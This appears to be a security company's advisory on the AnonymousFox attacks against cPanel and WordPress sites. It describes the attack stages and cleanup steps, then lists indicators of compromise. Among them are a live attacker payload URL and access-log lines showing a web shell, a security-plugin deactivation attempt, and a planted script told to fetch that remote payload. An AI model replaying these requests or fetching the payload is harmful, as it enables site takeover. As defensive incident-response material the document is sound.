AnonymousFox How to clean & updates

New AnonymousFox attacks emerged this month, affecting cPanel based sites.
Next, I will detail how the attack develops:

1. Using malicious scripts injected via WordPress, .contactemail is being edited.
2. cPanel password is changed, using a newly created email [email protected]
Alternatively, secondary email accounts are created like [email protected]
3. WordPress users with administrator privileges are created.
Look for “guest” username.
4. Malicious WordPress plugins are added, which are used to manage files
Example: “/wp-content/plugins/llmrhps/data.php”

Need help? Let us clean your site.

What do do when dealing with AnonymousFox hack?

Step 1
Ask your web host to perform a backup
  • Don’t panic.
  • Ask your web host to perform a backup, which will include database, emails and web files.
  • Download a backup copy on your local computer, to secure the latest working site version.
Step 2
Disable all your sites
  • Disable all active sites.
  • If your tech knowledge is limited, ask your web host to temporarily suspend your cPanel.
  • Check for newly created subdomains.
Step 3
Restore cPanel access.
  • Go to cPanel > Contact Information and change primary and secondary email and restore Pushbullet token.
  • Remove all FTP accounts under FTP Accounts.
  • Remove all suspicious email accounts under Email Accounts.
Step 4
Perform a thorough malware cleanup.

Notes:

cPanelLauren – “The anonymousfox vulnerability, caused by running vulnerable scripts on a cPanel account does not allow for root access.
Allowing vulnerable content on the server which in turn allows a way for an attacker to obtain access to the cPanel password reset does not constitute a bug.
What ultimately should be done here is remove the vulnerable content.”

Anonymous Fox has an official website, where members describe the current tools used for the attacks.
https://anonymousfox.co/

Need help? Try our Free security analysis.

Part 1: https://www.youtube.com/watch?v=IWsi1BGKqXA
Part 2: https://www.youtube.com/watch?v=5wcNvqhj7_E
Part 3: https://www.youtube.com/watch?v=ZvJp86xpcFU

Malicious URLs:
http://anonymousfox.io/v4/v4.txt
https://t.me/Anonymous_Fox/9

Malicious requests:
162.158.93.172 – – [02/Apr/2021:07:01:10 +1100] “POST /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1” 200
162.158.118.213 – – [02/Apr/2021:01:16:58 +1100] “GET /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1” 200 3703 “-” “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0”
[06/Mar/2021:06:16:50 +1100] “GET /wp-admin/plugins.php?action=deactivate&plugin=wordfence/wordfence.php&plugin_status=all&paged=1&s&_wpnonce=ffdf55bc02 HTTP/1.1” 403 1167 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[06/Mar/2021:06:16:58 +1100] “POST /wp-admin/update.php?action=upload-plugin HTTP/1.1” 200
[06/Mar/2021:06:17:05 +1100] “GET /wp-content/plugins/llmrhps/data.php HTTP/1.1” 200
[06/Mar/2021:23:27:12 +1100] “GET /wp-content/plugins/llmrhps/data.php HTTP/2” 200
[06/Mar/2021:23:27:15 +1100] “GET /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1” 200 100 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[06/Mar/2021:23:27:18 +1100] “POST /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1” 200 157 “-” “Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36”
[29/Mar/2021:02:26:41 +1100] “GET /wp-content/plugins/erwvxqtoto/wso.php HTTP/1.1” 200 3570 “https://example.com/wp-content/plugins/erwvxqtoto/up.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36”